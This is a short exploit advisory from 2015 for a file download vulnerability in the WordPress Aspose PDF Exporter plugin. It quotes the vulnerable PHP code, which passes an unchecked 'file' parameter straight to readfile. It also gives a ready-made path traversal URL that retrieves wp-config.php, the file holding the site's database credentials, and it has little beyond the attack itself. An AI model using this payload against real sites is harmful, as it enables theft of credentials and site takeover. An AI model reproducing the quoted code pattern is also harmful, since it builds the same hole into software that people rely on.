WordPress Aspose PDF Exporter File Download
Posted on 31 March 2015
Exploit Title : Wordpress Aaspose-pdf-exporter Plugin File Download Vulnerability Exploit Author : Ashiyane Digital Security Team Vendor Homepage: https://wordpress.org/plugins/aspose-pdf-exporter/ Download Link : https://downloads.wordpress.org/plugin/aspose-pdf-exporter.zip Date : 28 / 3 / 2015 Tested On : windows 8.1 + linux Kali ######################################### ######################################### ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php ~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Vulnerable Code : <?php $file = $_GET['file']; $file_arr = explode('/',$file); $file_name = $file_arr[count($file_arr) - 1]; header ("Content-type: octet/stream"); header ("Content-disposition: attachment; filename=".$file_name.";"); header("Content-Length: ".filesize($file)); readfile($file); exit; ?> http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=[File Address] Examples : http://localhost/wordpress/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php ######################################### ######################################### Discovered by : Rq07 #########################################
